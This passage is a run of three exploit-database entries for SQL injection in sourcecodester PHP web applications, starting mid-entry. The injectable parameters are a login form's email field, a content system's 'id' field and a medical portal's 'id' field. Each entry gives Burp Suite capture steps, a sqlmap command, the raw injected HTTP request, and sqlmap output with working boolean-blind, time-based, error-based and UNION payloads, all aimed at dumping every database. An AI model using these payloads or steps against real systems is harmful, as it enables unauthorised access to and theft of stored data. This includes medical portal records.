# Category: Web Application
# Tested on: WINDOWS 10

Step 1. Capture the request of the "http://127.0.0.1/ajax.php?action=login" page in Burp Suite
Step 2. Save the POST packet
Step 3. Run sqlmap on the request file using the command "python3 sqlmap.py -r request.txt --random-agent --batch --dbms "mysql" --time-sec=5 --no-cast --dbs "
Step 4. This will inject successfully and you will have an information disclosure of all database contents

POST the packet
---
POST /ajax.php?action=login HTTP/1.1
Host: 10.211.55.4
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 61
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=ltiafgjrnml0d8kqe58gcsk1v3
Origin: http://10.211.55.4
Referer: http://10.211.55.4/login.php
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

email=admin%40admin.com%27and%27p%27%3D%27p&password=admin123
---

SQLMAP
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: [email protected]'and'p'='p' AND 9108=9108 AND 'WlxU'='WlxU&password=admin123

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]'and'p'='p' AND (SELECT 3864 FROM (SELECT(SLEEP(5)))pNJR) AND 'hxyZ'='hxyZ&password=admin123
---
-
Content Management System 1.0 - 'id' SQL Injection
# Exploit Title: Content Management System 1.0 - 'id' SQL Injection
# Exploit Author: Zhayi (Zeo)
# Date: 2020-12-14
# Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
# Tested on: WINDOWS 10

Step 1. Capture the request of the "http://127.0.0.1/ajax.php?action=load_list" page in Burp Suite
Step 2. Save the POST packet
Step 3. Run sqlmap on the request file using the command "python3 sqlmap.py -r request.txt --random-agent --batch --dbms "mysql" --time-sec=5 --no-cast --dbs "
Step 4. This will inject successfully and you will have an information disclosure of all database contents

POST the packet
---
POST /ajax.php?action=load_list HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 63
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=ltiafgjrnml0d8kqe58gcsk1v3
Origin: http://127.0.0.1
Referer: http://127.0.0.1/index.php?page=list&c=sub_navigation_1&cid=eccbc87e4b5ce2fe28308fd9f2a7baf3
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

id=eccbc87e4b5ce2fe28308fd9f2a7baf3%27and%27u%27%3D%27u&start=0
---

SQLMAP
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' AND 9689=9689 AND 'ZPQO'='ZPQO&start=0

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' AND (SELECT 6418 FROM (SELECT(SLEEP(5)))ROIx) AND 'XaBw'='XaBw&start=0

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171716a71,0x5559707346467277634166536c6e786168576872504f746f7a5a4c52624d4c495742566651725242,0x7170627171),NULL,NULL,NULL,NULL,NULL-- -&start=0
---
-
Medical Center Portal Management System 1.0 - 'id' SQL Injection
# Exploit Title: Medical Center Portal Management System 1.0 - 'id' SQL Injection
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-10
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14594&title=Medical+Center+Portal+Management+System+using+PHP%2FMySQLi
# Affected Version: Version 1
# Patched Version: Unpatched
# Category: Web Application
# Tested on: Parrot OS

Step 1. Log in to the application with any verified user credentials
Step 2. Select Staff and select the view icon.
Step 3. You will be redirected to a page like "http://localhost/pages/emp_searchfrm.php?action=edit & id=1", or visit any page that has the "id" parameter. Capture the current page request in Burp Suite
Step 4. Save the request and run sqlmap on the request file using the command "sqlmap -r request -p id --time-sec=5 --dbs"
Step 5. This will inject successfully and you will have an information disclosure of all database contents.

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: action=edit & id=(SELECT (CASE WHEN (7289=7289) THEN 22 ELSE (SELECT 4035 UNION SELECT 6415) END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: action=edit & id=22 AND (SELECT 9743 FROM(SELECT COUNT(*),CONCAT(0x716b6a7871,(SELECT (ELT(9743=9743,1))),0x71706b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=edit & id=22 AND (SELECT 4861 FROM (SELECT(SLEEP(5)))xiXm)

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: action=edit & id=22 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b6a7871,0x4b445769664f765073644975666f6e50615968654f6b626259447767746c67516949686365597672,0x71706b7071),NULL,NULL,NULL,NULL-- -
---